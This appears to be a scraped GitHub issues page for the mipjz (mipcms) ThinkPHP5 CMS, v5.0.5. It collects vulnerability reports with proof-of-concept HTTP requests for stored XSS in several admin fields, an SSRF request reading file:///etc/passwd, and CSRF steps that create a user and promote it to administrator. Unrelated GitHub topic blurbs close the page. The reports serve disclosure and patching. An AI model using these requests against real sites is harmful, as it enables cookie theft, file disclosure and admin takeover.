sansanyun / mipjz Goto Github PK
View Code? Open in Web Editor NEWthinkphp5
Home Page: https://www.mipcms.com
License: Other
thinkphp5
Home Page: https://www.mipcms.com
License: Other
[Vulnerability Description]
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/
[Affected Product Code Base]
v5.0.5
[Vulnerability Proof]
POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId:
Content-Length: 426
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
{"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss<img src onerror=alert(1)>","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}
[Code Details]
Vulnerability location:app/setting/controller/ApiAdminDomainSettings.php
:
The problem arises in line 28——39:
$ch = curl_init();
$options = array(
CURLOPT_URL => $api,
CURLOPT_POST => true,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POSTFIELDS => implode("\n", $urls),
CURLOPT_HTTPHEADER => array('Content-Type: text/plain'),
);
curl_setopt_array($ch, $options);
$result = curl_exec($ch);
Using curl_exec, $api
is controllable and only trim
is made to the $api
parameter in the above code without any filtering, and finally the json encoded data is returned.
poc:
http://site/index.php?s=/setting/ApiAdminDomainSettings/urlPost
post:
postAddress=file:///etc/passwd&url=xx&id=
This is a stored XSS which allows attacker to insert javascript code into database. When user see the message, attacker is able to steal user's cookie.
Filename /app/widget/controller/ApiAdminWidgetPages.php
Code
public function itemAdd()
{
$title = input('post.title');
$url_name = input('post.url_name');
$template = input('post.template');
$content = input('post.content');
$keywords = input('post.keywords');
$description = input('post.description');
if (!$title) {
return jsonError('请输入名称');
}
if (!$url_name) {
return jsonError('请输入别名');
}
$itemInfo = db('WidgetPages')->where('title',$title)->find();
if ($itemInfo) {
return jsonError('名称已存在,请重新输入');
}
$itemInfo = db('WidgetPages')->where('url_name',$url_name)->find();
if ($itemInfo) {
return jsonError('别名已存在,请重新输入');
}
db('WidgetPages')->insert(array(
'id' => uuid(),
'title' => $title,
'url_name' => $url_name,
'template' => $template,
'keywords' => $keywords,
'description' => $description,
'content' => htmlspecialchars($content),
));
return jsonSuccess('成功');
}
The location of the vulnerability appears in the parameters keywords and description.
**POC_*:
POST /index.php?s=/widget/ApiAdminWidgetPages/itemAdd HTTP/1.1
Host: qing.com
Content-Length: 208
Accept: application/json, text/plain, */*
Origin: http://qing.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
dataId:
Content-Type: application/json;charset=UTF-8
Referer: http://qing.com/index.php?s=/admin/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=af90qhjsiusodrq36a86dgunr0
Connection: close
{"title":"aa","url_name":"a","template":"page","content":"<p><span style=\"\">asdasd</span><br></p>","keywords":"\">aa<script>alert('test');</script>","description":"\">aa<script>alert('test');</script>"}
After the administrator logged in, open the following one page
one.html add a Super Manager.
<script>history.pushState('', '', '/')</script>
After the administrator logged in, open the following one page one.html add a Super Manager.
<script>history.pushState('', '', '/')</script>
Poc address:https://github.com/sp1d3r/swf_json_csrf
1、Add a user:
http://[Attack domain]/read.html?jsonData={%22groupId%22:1,%22username%22:%22admin123%22,%22password%22:%220192023a7bbd73250516f069df18b500%22,%22rpassword%22:%220192023a7bbd73250516f069df18b500%22}&php_url=http://[Attack domain]/test.php&endpoint=http://[Target domain]/index.php?s=/user/ApiAdminUser/itemAdd
2、Promote user privileges to administrator privileges
Log in with admin123, admin123, and get user UID
Promote user privileges
http://[Attack domain]/read.html?jsonData={"uid":"[The UID]","groupId":1,"username":"admin123","password":"3f7caa3d471688b704b73e9a77b1107f","rpassword":"3f7caa3d471688b704b73e9a77b1107f"}&php_url=http://[Attack domain]/test.php&endpoint=http://[Target domain]/index.php?s=/user/ApiAdminUser/itemEdit
After the administrator logged in, open the following one page one.html add a Super Manager.
<script>history.pushState('', '', '/')</script>
[Vulnerability Description]
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the tag category name field from categoryAdd.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/
[Affected Product Code Base]
v5.0.5
[Vulnerability Proof]
POST /index.php?s=/tag/ApiAdminTagCategory/categoryAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId:
Content-Length: 286
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: jERzUAUdppHHnews=2%2C1; jERzUAUdppHHproduct=1%2C3; csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
{"pid":0,"name":"xss<img src onerror=alert(1)>","url_name":"aaa","seo_title":"","template":"tag.html","detail_template":"tagDetail.html","category_url":"/tag/<url_name>/","category_page_url":"<category_url>index_<page>.html","detail_url":"/tag/<id>.html","description":"","keywords":""}
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.